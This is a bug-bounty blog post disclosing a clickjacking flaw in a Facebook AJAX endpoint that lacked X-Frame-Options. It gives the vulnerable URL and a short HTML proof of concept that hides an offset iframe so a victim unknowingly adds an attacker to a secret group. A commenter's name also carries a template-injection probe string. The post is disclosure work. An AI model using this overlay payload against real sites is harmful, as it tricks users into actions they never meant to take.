Facebook ClickJacking – How we put a new dress on Facebook UI

facebook-banner

Hi Bug Hunters,

Today we will explain how we redressed facebook ui and made it so easy to fool a victim to for example, Add the attacker as a member in one of his own secret groups on facebook.

Here’s some details about the issue:


Vulnerability Type:

ClickJacking

The vulnerable url:
https://www.facebook.com/ajax/home/generic.php?dpr=1&sidecol=true&path=/groups/559357440894888/&endpoint=/ajax/home/generic.php&__user=

100000152886101&__a=1&__dyn=&__req=jsonp_8&__be=0&__pc=EXP1:DEFAULT&__rev=2286573&__cid=

Where:
1. 559357440894888 is the targeted resource (group)
2. 100000152886101 is the targeted user who owns the resource, (Just a parameter value sent along with the first GET request to be included in the form action to successfully complete the request)

The problem:
When this endpoint (/ajax/home/generic.php) calling an client side facebook path (path=) related to a facebook resource (pages, groups, etc..) this resource lacks the “X-Frame-Options” and became iframable. The fact is that all the actions inside the iframable response are depending on another resource that has not been loaded to complete the AJAXed requests to be made but LUCKILY we found that the iframable resource contains some “Forms” that are able to be submitted by the victim.

The PoC Impact:
Fooling a victim to add a specific user to a targeted secret group or even any other resource!!

PoC Code (In case you need it):
<div style=”overflow: hidden; width: 145px; height: 28px; position: relative;” >
<iframe src=”URL” style=”border: 0pt none ; left: -7px; top: -807px; position: absolute; width: 1406px; height: 1321px;” scrolling=”no”></iframe></div></br>

PoC Video:


Hey!
Building a website? Or already built a one? Think twice before going public and let us protect your business!

(Visited 1,686 times, 1 visits today)
Share
  • Srujan Arju

    Great Find! Congrats! i wonder how much they rewarded you ?

  • Hidalgo Perez Francesco{{8*9}}

    hi sir, nice find, can I know how much did they rewarded you? like $5k right? Thanks!